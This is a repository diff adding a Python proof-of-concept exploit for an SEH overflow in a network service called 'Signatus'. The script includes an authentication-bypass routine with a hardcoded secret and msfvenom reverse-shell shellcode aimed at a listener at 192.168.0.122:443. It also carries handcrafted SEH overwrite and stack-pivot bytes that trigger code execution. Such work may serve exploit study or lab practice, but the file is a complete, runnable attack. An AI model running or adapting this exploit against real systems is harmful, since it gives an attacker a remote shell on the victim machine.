Added PoC of exploit

Exploit/poc.py

@@ -0,0 +1,102 @@
+#!/usr/bin/python3
+
+# SEH Overflow Exploit for Signatus
+# William Moody, 13.06.2021
+
+import sys
+import time
+import socket
+from struct import pack
+
+# Check that all required params are passed
+if len(sys.argv) != 2:
+    print("Usage: %s SERVER" % sys.argv[0])
+    sys.exit(1)
+
+# Server IP and port variables
+server = sys.argv[1]
+port = 9999
+
+# Gets the one time dword required to authenticate with the server
+OTD_SECRET = 0x74829726
+def getOTD():
+    seconds = int(time.time()) + 3599
+    s = (seconds // 10) & 0xff
+    sec_d = s | (((s*s) >> 4) << 8) \
+        | (((s*s*s) >> 8) << 16) | ((s*s*s*s) >> 12) << 24
+    return (sec_d ^ OTD_SECRET) & 0xffffffff
+
+# Sends a packet to the server and port defined as global variables
+def s_send(buf):
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((server, port))
+    s.send(buf)
+    s.close()
+
+# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.122 LPORT=443 -b "\x00\x0a\x1a" -f python -v shell
+shell =  b"\x90" * 20
+shell += b"\xba\xc8\xb2\x8e\x36\xdb\xc5\xd9\x74\x24\xf4\x5d"
+shell += b"\x2b\xc9\xb1\x52\x83\xed\xfc\x31\x55\x0e\x03\x9d"
+shell += b"\xbc\x6c\xc3\xe1\x29\xf2\x2c\x19\xaa\x93\xa5\xfc"
+shell += b"\x9b\x93\xd2\x75\x8b\x23\x90\xdb\x20\xcf\xf4\xcf"
+shell += b"\xb3\xbd\xd0\xe0\x74\x0b\x07\xcf\x85\x20\x7b\x4e"
+shell += b"\x06\x3b\xa8\xb0\x37\xf4\xbd\xb1\x70\xe9\x4c\xe3"
+shell += b"\x29\x65\xe2\x13\x5d\x33\x3f\x98\x2d\xd5\x47\x7d"
+shell += b"\xe5\xd4\x66\xd0\x7d\x8f\xa8\xd3\x52\xbb\xe0\xcb"
+shell += b"\xb7\x86\xbb\x60\x03\x7c\x3a\xa0\x5d\x7d\x91\x8d"
+shell += b"\x51\x8c\xeb\xca\x56\x6f\x9e\x22\xa5\x12\x99\xf1"
+shell += b"\xd7\xc8\x2c\xe1\x70\x9a\x97\xcd\x81\x4f\x41\x86"
+shell += b"\x8e\x24\x05\xc0\x92\xbb\xca\x7b\xae\x30\xed\xab"
+shell += b"\x26\x02\xca\x6f\x62\xd0\x73\x36\xce\xb7\x8c\x28"
+shell += b"\xb1\x68\x29\x23\x5c\x7c\x40\x6e\x09\xb1\x69\x90"
+shell += b"\xc9\xdd\xfa\xe3\xfb\x42\x51\x6b\xb0\x0b\x7f\x6c"
+shell += b"\xb7\x21\xc7\xe2\x46\xca\x38\x2b\x8d\x9e\x68\x43"
+shell += b"\x24\x9f\xe2\x93\xc9\x4a\xa4\xc3\x65\x25\x05\xb3"
+shell += b"\xc5\x95\xed\xd9\xc9\xca\x0e\xe2\x03\x63\xa4\x19"
+shell += b"\xc4\x4c\x91\x21\x6e\x25\xe0\x21\x8f\x0e\x6d\xc7"
+shell += b"\xe5\x60\x38\x50\x92\x19\x61\x2a\x03\xe5\xbf\x57"
+shell += b"\x03\x6d\x4c\xa8\xca\x86\x39\xba\xbb\x66\x74\xe0"
+shell += b"\x6a\x78\xa2\x8c\xf1\xeb\x29\x4c\x7f\x10\xe6\x1b"
+shell += b"\x28\xe6\xff\xc9\xc4\x51\x56\xef\x14\x07\x91\xab"
+shell += b"\xc2\xf4\x1c\x32\x86\x41\x3b\x24\x5e\x49\x07\x10"
+shell += b"\x0e\x1c\xd1\xce\xe8\xf6\x93\xb8\xa2\xa5\x7d\x2c"
+shell += b"\x32\x86\xbd\x2a\x3b\xc3\x4b\xd2\x8a\xba\x0d\xed"
+shell += b"\x23\x2b\x9a\x96\x59\xcb\x65\x4d\xda\xfb\x2f\xcf"
+shell += b"\x4b\x94\xe9\x9a\xc9\xf9\x09\x71\x0d\x04\x8a\x73"
+shell += b"\xee\xf3\x92\xf6\xeb\xb8\x14\xeb\x81\xd1\xf0\x0b"
+shell += b"\x35\xd1\xd0"
+
+# < Clear the log >
+# So that we know we control all of the log
+# and wont get messed up from previous entries
+buf  = pack("<I", getOTD())
+buf += pack("<I", 0x3)
+s_send(buf)
+
+# < Write to log >
+# Beginning of offset / shellcode
+buf  = pack("<I", getOTD())
+buf += pack("<I", 0x1)
+buf += shell
+buf += b"A" * (2047 - len(shell)) # offset
+s_send(buf)
+
+# < Write to log >
+# Remainder of offset, SEH overwrite
+buf  = pack("<I", getOTD())
+buf += pack("<I", 0x1)
+buf += b"B" * 129              # offset continued...
+buf += b"\xeb\x06\x90\x90"     # nSeh      -> jmp 0x6 ; nop ; nop (jump over eip into short shellcode part below)
+buf += pack("<I", 0x60ae1b2b)  # eip / seh -> pop ecx ; pop ecx ; ret
+buf += b"\xb8\xc0\xf8\xff\xff" # mov eax, 0xfffff8c0 (redirect execution to top of buffer [shellcode])
+buf += b"\xf7\xd8"             # neg eax
+buf += b"\x01\xc4"             # add esp, eax
+buf += b"\xff\xe4"             # jmp esp
+buf += b"C" * 33               # required to trigger the seh overwrite rather than another crash
+s_send(buf)
+
+# < Read from log >
+# Trigger the overflow
+buf  = pack("<I", getOTD())
+buf += pack("<I", 0x2)
+s_send(buf)